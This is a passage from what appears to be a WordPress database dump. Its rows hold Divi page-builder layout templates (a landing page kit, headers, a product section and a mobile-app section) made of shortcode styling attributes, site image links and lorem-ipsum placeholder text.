allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"30px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Social Links\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">Stay tuned.</span></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"20px||30px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" parallax_2=\"off\" parallax_method_2=\"off\" custom_width_px=\"860px\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p><a href=\"#\"><img class=\"alignnone size-full wp-image-5034\" style=\"margin-right: 2%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/facebook.png\" alt=\"facebook\" width=\"102\" height=\"102\" /></a><a href=\"https://companyregistration.online/wp-content/uploads/2016/07/instagram.png\"><img class=\"alignnone size-medium wp-image-5035\" style=\"margin-right: 2%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/instagram.png\" alt=\"instagram\" width=\"102\" height=\"102\" /></a><a href=\"https://companyregistration.online/wp-content/uploads/2016/07/twitter.png\"><img class=\"alignnone size-medium wp-image-5036\" style=\"margin-right: 2%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/twitter.png\" alt=\"twitter\" width=\"102\" height=\"102\" /></a><a href=\"https://companyregistration.online/wp-content/uploads/2016/07/rss.png\"><img class=\"alignnone size-medium wp-image-5037\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/rss.png\" alt=\"rss\" width=\"102\" height=\"102\" /></a></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/bg_footer.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px||104px|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"General CTA\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#a5bdc9\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p>Limited Offer</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Get 10 free images.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">Get 10 free images.</span></p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#a4bbc7\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px||40px|\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\r\n\r\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"LEARN MORE\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#ffffff\" button_bg_color=\"#1fbacd\" button_border_width=\"13\" button_border_color=\"#1fbacd\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#1fbacd\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\r\n\r\n\r\n\r\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Landing Page Kit','','publish','closed','closed','','landing-page-kit','','','2016-05-16 21:19:38','2016-05-16 19:19:38','',0,'https://companyregistration.online/et_pb_layout/landing-page-kit/',0,'et_pb_layout','',0),(5728,1,'2016-05-27 19:41:17','2016-05-27 17:41:17','[et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\" collapsed=\"off\" template_type=\"section\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"98px||90px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"104px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Header #2\" title=\"Limited time offer. Get 10 free stock images.\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"620px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"TRUSTED AND USED BY MANY HUMANS AND COMPANIES\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_text_color=\"#7a8a97\" text_letter_spacing=\"1px\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">TRUSTED AND USED BY MANY HUMANS AND COMPANIES</span></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"800px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"30px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/01_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"24px\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section]','Header #2','','publish','closed','closed','','header-2','','','2016-05-27 19:41:17','2016-05-27 17:41:17','',0,'https://companyregistration.online/et_pb_layout/header-2/',0,'et_pb_layout','',0),(5729,1,'2016-05-27 19:41:28','2016-05-27 17:41:28','[et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"160px||160px|\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Header #3\" title=\"We help humans to find the best stock images.\" url_new_window=\"off\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" max_width=\"620px\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/img_h1.png\" show_in_lightbox=\"off\" url=\"#\" url_new_window=\"off\" use_overlay=\"off\" hover_overlay_color=\"#00bcd4\" hover_icon=\"%%137%%\" animation=\"bottom\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Header #3','','publish','closed','closed','','header-3','','','2016-05-27 19:41:28','2016-05-27 17:41:28','',0,'https://companyregistration.online/et_pb_layout/header-3/',0,'et_pb_layout','',0),(5731,1,'2016-05-27 19:41:52','2016-05-27 17:41:52','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"The Product\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\" text_letter_spacing=\"-1px\"]\n\n<p>The Product</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Millions of high-quality images and videos.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Millions of high-quality<br /> images and videos.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px|||\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"40px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/023-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||104px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Easy navigation</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Large catalog</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Free upgrade</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Find quick</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','The Product','','publish','closed','closed','','the-product','','','2016-05-27 19:41:52','2016-05-27 17:41:52','',0,'https://companyregistration.online/et_pb_layout/the-product/',0,'et_pb_layout','',0),(5733,1,'2016-05-27 19:42:19','2016-05-27 17:42:19','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/bg_gradient1.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Mobile App\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#96cbd6\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Mobile App</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Magical Device Balance.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Magical Device Balance.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#c1e1e7\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px|||\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"60px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"34\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\" disabled=\"off\" disabled_on=\"off|on|on\"]\n\n\n\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>It\'s a title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\" disabled=\"off\" disabled_on=\"on||\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"14\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\n\n\n\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>It\'s a title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"14\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" 